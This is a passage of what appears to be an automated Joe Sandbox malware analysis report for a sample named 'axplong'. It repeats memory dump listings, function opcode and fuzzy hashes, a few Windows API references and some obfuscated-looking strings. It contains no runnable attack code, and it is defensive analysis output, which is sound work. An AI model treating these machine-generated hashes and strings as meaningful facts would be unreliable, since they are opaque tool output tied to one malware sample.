                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
                      • API String ID: 0-214772295
                      • Opcode ID: caae322caafbc82da84b1e898c84867226c2b0ab16857f13556ee6d25ad63284
                      • Instruction ID: 4d602aeec2959b05d093f0cddb330347687bac5a8a1d5b8b8a6bbe2ac62c4b88
                      • Opcode Fuzzy Hash: caae322caafbc82da84b1e898c84867226c2b0ab16857f13556ee6d25ad63284
                      • Instruction Fuzzy Hash: 7782F470914388DBEF14EF68CD497DD7BB6AB42304F608188E805673C2D7799A88DBD2
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 590d7676aea1bbd69463c8da658b117fb8150ddb533ac58ddd5d5cb79548842e
                      • Instruction ID: 74b48c29e70ee53e8bf7abc5d8c69d4c4538db1af80809020b6e5bca555a4633
                      • Opcode Fuzzy Hash: 590d7676aea1bbd69463c8da658b117fb8150ddb533ac58ddd5d5cb79548842e
                      • Instruction Fuzzy Hash: 83C26F72E0422A8FDB25CE28DE41BE9B3B5EB84354F1441EED44DE7240E775AE85AF40
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction ID: 2e4d470f7f91bf0ff9fad84777ab54a5c277b5a09620aa079bd1661ca0c4db47
                      • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction Fuzzy Hash: 59F13D72E0021A9BDF14CFA8C981BADB7B1FF88324F15826DD815A7345D731AE41DB94
                      APIs
                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,00F9CE82,?,?,?,?,00F9CEB7,?,?,?,?,?,?,00F9C42D,?,00000001), ref: 00F9CB33
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FilePreciseSystem
                      • String ID:
                      • API String ID: 1802150274-0
                      • Opcode ID: 97a9e8e8e16361ea357e390cb024bdbc6eda2f9354f496f54662295486226b39
                      • Instruction ID: 66aac58e07e5d99fb43ed6dbec2a3e90ed9b6525d9004d05a65cc028e0e3988f
                      • Opcode Fuzzy Hash: 97a9e8e8e16361ea357e390cb024bdbc6eda2f9354f496f54662295486226b39
                      • Instruction Fuzzy Hash: DFD02233A0303CA3CE013FA0EC099ACBB098E84B203000222E808271208A606C00BBD4
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction ID: c47c0e00a8a3c647b95f5652dda55cda03487f7f38133a0bebc120f03d9f4a95
                      • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction Fuzzy Hash: 3A51B631B0C7485ADB38BA3B88953FE77AA9FC53A0F140459D442DB682CA11DD45FF51
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c847211cb6cb96c28a63642da3f3ff05fdbde85e747676672837c04071b58c1a
                      • Instruction ID: 3675271a9c59eb337e909bd762ce00b4e11a4b385a4c21db5648c273864a46e1
                      • Opcode Fuzzy Hash: c847211cb6cb96c28a63642da3f3ff05fdbde85e747676672837c04071b58c1a
                      • Instruction Fuzzy Hash: DD2261B3F516144BDB0CCB5DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9159A44
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c38ab01d2c8d350c17f6d11bf62910aa0f25610bc21a9a9b8800354048884958
                      • Instruction ID: 39d3ffd3f7d3b9568ef8539ffee37d154c52d01bda67c05110378301c20a9272
                      • Opcode Fuzzy Hash: c38ab01d2c8d350c17f6d11bf62910aa0f25610bc21a9a9b8800354048884958
                      • Instruction Fuzzy Hash: 55B16A3261460A8FD719DF28C586F657BA0FF45364F29865CE899CF2A1C336E982DF40
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 00F8247E
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID:
                      • API String ID: 2659868963-0
                      • Opcode ID: bf22ae7523af8b923d0ff1b9ec33b48fd458d3803f363d710260017aa0d6eca6
                      • Instruction ID: 475f1c7d7d5e8f71238a44daf73c0133d9747dee7137195fb2cdb402483caae1
                      • Opcode Fuzzy Hash: bf22ae7523af8b923d0ff1b9ec33b48fd458d3803f363d710260017aa0d6eca6
                      • Instruction Fuzzy Hash: 49518AB2D006098BEF19CF54D8C57AABBF4FB48724F24852AD404EF291E3749940EF50
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4d6ae7c74844db90d0ba3653d44e6da34e52f556e1ae6b0200c44ed1ceded6cd
                      • Instruction ID: 2e19dbc0127bf477d1abfa5c4ccd7576f546bd87e2620365e56d7af2a158ce6e
                      • Opcode Fuzzy Hash: 4d6ae7c74844db90d0ba3653d44e6da34e52f556e1ae6b0200c44ed1ceded6cd
                      • Instruction Fuzzy Hash: 3451A3716083928FD319CF2D851523ABFE2AFD5300F084A9EE4D687292D774E644DBA1
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3df61fa57991f9be02cb64139120814876ebd0d37ef33477f135ec9441f4d8d1
                      • Instruction ID: e06cbafc73fd2f97b45b6bc4240739e21f05ef2180fca7b2eeaeb74f31e15575
                      • Opcode Fuzzy Hash: 3df61fa57991f9be02cb64139120814876ebd0d37ef33477f135ec9441f4d8d1
                      • Instruction Fuzzy Hash: E821B673F205394B770CC47E8C5727DB6E1C68C541745423AF8A6EA2C1D96CD917E2E4
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fb99dea7a15309c323c64cb3e94ecc49b4607978f5ed79944bb67472994c953c
                      • Instruction ID: 1b4b720dd23d6ec36e082c6468d5ec50794e9e0e7bad098a865e85f436fffb63
                      • Opcode Fuzzy Hash: fb99dea7a15309c323c64cb3e94ecc49b4607978f5ed79944bb67472994c953c
                      • Instruction Fuzzy Hash: 88117723F30C255A675C817D8C1727AA5D2DBD825071F533AD826EB284E994DE23E290
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: f2727f536e895ebe4926f9dc87955fa487712a162dab79b743943c262b3c76ec
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: BD11E67BA0014347D605862DCBF6FB6A796EEC53B1B3C437ED0414B658FA229947F900
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c19a44cd79f88d73de7e7d2796829a4d4ee3b76e85de9b5582d196efff8e2a73
                      • Instruction ID: 91cde06dacca7579c022b697d3c5f32309b37681a43ec150ea73917670c0208b
                      • Opcode Fuzzy Hash: c19a44cd79f88d73de7e7d2796829a4d4ee3b76e85de9b5582d196efff8e2a73
                      • Instruction Fuzzy Hash: D2E08630181A08AEDF25BB1ADC18DC83B59EB51350F004418F8048E521CB3EDD91DD80
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction ID: ff0f985288b1197e7227eaca42062d3e6c6ad04acf62ac9a78eb1b616e9eae3f
                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction Fuzzy Hash: 28E0B672915228EBCB15DB9D894498AF2ACEB49B50F554496B501D3251C274DF00DBD1
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
